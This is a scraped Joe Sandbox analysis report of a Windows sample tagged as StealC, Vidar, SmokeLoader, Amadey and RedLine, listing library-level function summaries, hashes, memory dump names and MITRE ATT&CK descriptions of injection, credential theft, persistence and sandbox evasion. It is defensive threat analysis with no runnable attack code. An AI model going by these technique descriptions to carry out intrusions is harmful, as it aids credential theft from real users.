API String ID: 2744216297-0
Opcode ID: 7de3675c49c61ac3b54f708a564d03359585d6399c9c3791daf1304c0453efe3
Instruction ID: 272fd4789bfd6d944f87be3100e90f2e14adbeff745d82f1ec20f829e745013a
Opcode Fuzzy Hash: 7de3675c49c61ac3b54f708a564d03359585d6399c9c3791daf1304c0453efe3
Instruction Fuzzy Hash: 5DF0373A000166BBCF621FD5DC08B8E3F27FB46361F045010FA1886270C6318920DBD4

Function 0060D09F Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,0060D03C,00000064), ref: 0060D0C2
RtlLeaveCriticalSection.NTDLL(00655690), ref: 0060D0CC
WaitForSingleObjectEx.KERNEL32(006585C0,00000000,?,0060D03C,00000064,?,771B0F00,?,005F759D,006585C0), ref: 0060D0DD
RtlEnterCriticalSection.NTDLL(00655690), ref: 0060D0E4

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: dbaf63e34869ab1929dc98c5880ed4a1cdc27b8d848c6233d0d51b6c2958f57b
Instruction ID: 0cbe552ebb3ffbb440bba06aac3b4b14e775b69184e61ce4a5af0f83815fbf1f
Opcode Fuzzy Hash: dbaf63e34869ab1929dc98c5880ed4a1cdc27b8d848c6233d0d51b6c2958f57b
Instruction Fuzzy Hash: 63E09235942634BBDB111FC0EC2CA8E3F27EB06B62F916010FA0B57170C6712801CBD5

Function 00628EBA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user~1\AppData\Local\Temp\1000064001\NewLatest.exe, xrefs: 00628EFD, 00628F3A

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user~1\AppData\Local\Temp\1000064001\NewLatest.exe
API String ID: 0-2190204624
Opcode ID: 236492b9884f59e47762121b9c9ea97318ed1bb1dc99959ddf0c73abbf9cdaca
Instruction ID: 0a27369b883bb60e537e975687dfa5968125b1ee4b695528138066526abbbd76
Opcode Fuzzy Hash: 236492b9884f59e47762121b9c9ea97318ed1bb1dc99959ddf0c73abbf9cdaca
Instruction Fuzzy Hash: 4041E371A00A24AFCB11DF99ED85DAEBBBBEB98340F14406AF405E7341DB709A41CF54

Function 0062E350 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 0062E0F9: GetOEMCP.KERNEL32(00000000,0062E36B,?,?,0062748E,0062748E,?), ref: 0062E124

_free.LIBCMT ref: 0062E3C8

Strings

@"e, xrefs: 0062E3F0

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: _free
String ID: @"e
API String ID: 269201875-363956005
Opcode ID: fa87b8e0b8393695c5caec37aa90b115c9d16af76586a632156afb032978e725
Instruction ID: 41cc54fa23aefdcdd7e0d5016969ac0b3388524f6af0e34da3d2ba1bff0f6fe0
Opcode Fuzzy Hash: fa87b8e0b8393695c5caec37aa90b115c9d16af76586a632156afb032978e725
Instruction Fuzzy Hash: BF31E471900669AFCB01DFA8E840ADE7BF6EF40315F114069F9109B291EB72DD51CF50

Function 0060B4D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0060B55E
RaiseException.KERNEL32(?,?,?,?), ref: 0060B583

Part of subcall function 00623A11: RaiseException.KERNEL32(E06D7363,00000001,00000003,0064E380,?,?,?,0064E380), ref: 00623A71

Part of subcall function 00628A8F: IsProcessorFeaturePresent.KERNEL32(00000017,0062A5CD,?,?,0062685A,?,?,?,?,0062748E,?), ref: 00628AAB

Strings

csm, xrefs: 0060B512

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
String ID: csm
API String ID: 1924019822-1018135373
Opcode ID: c4ac82e5be314b246b92ea6a8291055f750edeba2bee3ddf6774b7ec5ab73eca
Instruction ID: 162a9bc8b9386476a9ece343bb7efab5de9544ba5f3139b8865ce359875a99a4
Opcode Fuzzy Hash: c4ac82e5be314b246b92ea6a8291055f750edeba2bee3ddf6774b7ec5ab73eca
Instruction Fuzzy Hash: C121AC71D81218ABCF2ADF95EC45AEFB7BAEF04710F548449E805AB390CB70AD45CB91

Function 0062674B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006268DC: _free.LIBCMT ref: 006268EA

Part of subcall function 0062AF39: MultiByteToWideChar.KERNEL32(0062E5FA,00000100,E8458D00,00000000,00000000,00000020,?,0062F0AC,00000000,00000000,00000100,00000020,00000000,00000000,E8458D00,00000100), ref: 0062AFA9

GetLastError.KERNEL32(?,?,?,?,?,?,?,00626C4A,00000000,?,00000000,?), ref: 006267AF
__dosmaperr.LIBCMT ref: 006267B6

Strings

Jlb, xrefs: 006267A0

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr_free
String ID: Jlb
API String ID: 4030486722-3904435675
Opcode ID: 092d67352105358c4c94eff277bcb4e0ce7afb4844292dd058ab43fc3277b4a4
Instruction ID: 31787ba2c0b07987ac1e9b403b2588a73b2441f5630e72a370ec343985188e18
Opcode Fuzzy Hash: 092d67352105358c4c94eff277bcb4e0ce7afb4844292dd058ab43fc3277b4a4
Instruction Fuzzy Hash: 2B21C331600E21ABDB21AF66FC01E9B77ABAF80364B10861DFC2997290D774E8118F91

Function 00621611 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00621671
std::invalid_argument::invalid_argument.LIBCONCRT ref: 006216BC

Strings

pContext, xrefs: 006216B4

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 3390424672-2046700901
Opcode ID: e702b1a6e809cb000710b6905b004e1f6baa44438d46df17bc89866632196bcc
Instruction ID: 2f0103c14794a5408b12580d9b50ebbe1c39de5b252feeec813f50f173a32053
Opcode Fuzzy Hash: e702b1a6e809cb000710b6905b004e1f6baa44438d46df17bc89866632196bcc
Instruction Fuzzy Hash: EA112936A049349BCF15EF24D8949AD776BAFA6360B194069EC12AF381DB74DD058FC0

Function 0062E0F9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,0062E36B,?,?,0062748E,0062748E,?), ref: 0062E124
GetACP.KERNEL32(00000000,0062E36B,?,?,0062748E,0062748E,?), ref: 0062E13B

Strings

kb, xrefs: 0062E101, 0062E15E

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID:
String ID: kb
API String ID: 0-2584316291
Opcode ID: b9f16762da98c111ee6abd8df7966d81b62e18b5d25eb451dffa6f2dbb373bbe
Instruction ID: c082c951afa4537a038c67580d863fdcb43a2e1ea1a8d74c609d30a38c835131
Opcode Fuzzy Hash: b9f16762da98c111ee6abd8df7966d81b62e18b5d25eb451dffa6f2dbb373bbe
Instruction Fuzzy Hash: 3EF06230400A258BEB20DB68EC4C7BC7772AB01339F540364E5359B2E2C7725955CF40

Function 0061B83C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0061B85E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0061B871

Strings

pContext, xrefs: 0061B869

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 548886458-2046700901
Opcode ID: 495fd4d09084cc7145476d156d2e4686fe6bbc220968cb603db76e9a871f2009
Instruction ID: 068336975ffbf7918824f5cc072bc844afcc10354007d1eb6fd4f7b6f41cb2bb
Opcode Fuzzy Hash: 495fd4d09084cc7145476d156d2e4686fe6bbc220968cb603db76e9a871f2009
Instruction Fuzzy Hash: 7BE09239B4012867CB04B765EC49C9EB7AF9EC5B10715402AE911A7391EB74EA058AD4

Function 006133DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 0061340C

Strings

version, xrefs: 006133F1
pScheduler, xrefs: 00613404

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 2141394445-3154422776
Opcode ID: 0d7fb814977e3dd47ddaf3aa976f0de602f6d9ee5b06b521c2cc60b5827c1eee
Instruction ID: 1e51a94dff56d9768ff60f245f68c925dd735bbddb2890cd0236aa801b2e9ebc
Opcode Fuzzy Hash: 0d7fb814977e3dd47ddaf3aa976f0de602f6d9ee5b06b521c2cc60b5827c1eee
Instruction Fuzzy Hash: FBE0863458021CBACB19FA54D807EDD7B6B9B20308F08C025B462662D1EBF597D9CA85

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1Vkf7silOj.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Threatname: SmokeLoader

Threatname: Amadey

Threatname: RedLine

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Bitcoin Miner

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Windows Analysis Report
1Vkf7silOj.exe

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

